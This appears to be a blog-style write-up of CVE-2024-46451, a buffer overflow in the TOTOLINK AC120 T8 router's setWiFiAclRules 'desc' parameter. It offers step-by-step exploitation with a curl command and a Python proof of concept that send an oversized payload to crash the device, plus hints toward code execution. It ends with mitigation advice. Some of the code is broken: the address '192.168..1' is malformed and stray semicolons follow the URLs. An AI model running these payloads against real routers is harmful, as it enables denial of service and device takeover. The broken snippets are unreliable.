CVE-2024-46451 - Exploiting Buffer Overflow in TOTOLINK AC120 T8 (v4.1.5cu.861_B20230220) setWiFiAclRules

CVE-2024-46451 is a newly disclosed buffer overflow vulnerability in the TOTOLINK AC120 T8 router, firmware version v4.1.5cu.861_B20230220. Specifically, the flaw exists in the setWiFiAclRules function, which improperly handles the desc parameter. This vulnerability allows attackers on the local network — and potentially remote attackers if the administration interface is internet-exposed — to execute arbitrary code or crash the device. In this article, we’ll break down what’s happening, show you how the exploit works, and discuss secure practices.

Where’s the Bug?

The setWiFiAclRules function is part of the web administration backend. Users can set or change WiFi Access Control List (ACL) rules using a web form or API call. One of the parameters, desc, is a text description. The application doesn’t check the length of desc before copying it into a fixed-size buffer, making it vulnerable to a buffer overflow.

The Problematic Code

Even if TOTOLINK hasn’t published source code, analysis of the binary (reverse engineering) shows something like this:

void setWiFiAclRules(char *desc, ...) {
    char buf[128];
    // INSECURE: Using strcpy without checking length
    strcpy(buf, desc);
    // ... rest of the code ...
}

If a user enters more than 128 characters for desc, it will overwrite adjacent memory, which may lead to arbitrary code execution or a device crash.

Step 1: Authenticate (if needed)

Login with your credentials. Session-based cookies or HTTP basic auth might be used.

Step 2: Send the Malicious Payload

You can abuse the vulnerability with simple tools like curl. Here’s an example attack sending a super-long desc parameter:

curl -X POST "http://192.168..1/cgi-bin/cstecgi.cgi"; \
  -d "func=setWiFiAclRules" \
  -d "desc=$(python3 -c 'print("A"*256)')" \
  --cookie "SESSION_ID=<your_session_id>"

The router may instantly reboot, crash, or behave oddly.

- With more skill, an attacker could carefully craft the overflow, redirecting execution to run malicious code (such as opening up a remote shell).

A more generic proof-of-concept in Python

import requests

target_url = 'http://192.168..1/cgi-bin/cstecgi.cgi';
payload = 'A'*256  # Overflows the 128-byte buffer
data = {
    'func': 'setWiFiAclRules',
    'desc': payload,
}
cookies = {'SESSION_ID': 'your_session_cookie'}

response = requests.post(target_url, data=data, cookies=cookies)
print('Status:', response.status_code)
print('Response:', response.text)

Potential Impact

- Crash (Denial of Service): The most obvious result is a router reboot/crash, boot-loop, or "bricking".
- Remote Code Execution: With a special crafted payload, an attacker may run arbitrary commands, potentially taking over the router.
- Network Compromise: Routers mediate all LAN/WAN traffic, so this could expose internal devices, steal credentials, or set up man-in-the-middle attacks.

Update Firmware: If TOTOLINK issues an updated firmware, apply it as soon as possible.

- Restrict Admin Access: Never expose your router's web admin to the Internet, and keep it on a separate, trusted local network.

References

- CVE Details listing for CVE-2024-46451
- TOTOLINK Security Bulletins
- Original vulnerability report (Packet Storm)
- Common buffer overflow exploitation techniques

Final Thoughts

This vulnerability reminds us that even “consumer-grade” routers must be treated as critical infrastructure. Attackers don’t always need to be hackers-in-the-basement; automated malware, botnets, or rogue insiders can leverage flaws like CVE-2024-46451 with little effort.

If you have a TOTOLINK AC120 T8 (v4.1.5cu.861_B20230220) in your network, check for updates, restrict access, and consider an upgrade. For researchers, this bug is a textbook example of why secure coding and input validation matter at every level of device development.

Timeline

Published on: 09/16/2024 13:15:10 UTC
Last modified on: 09/17/2024 14:35:31 UTC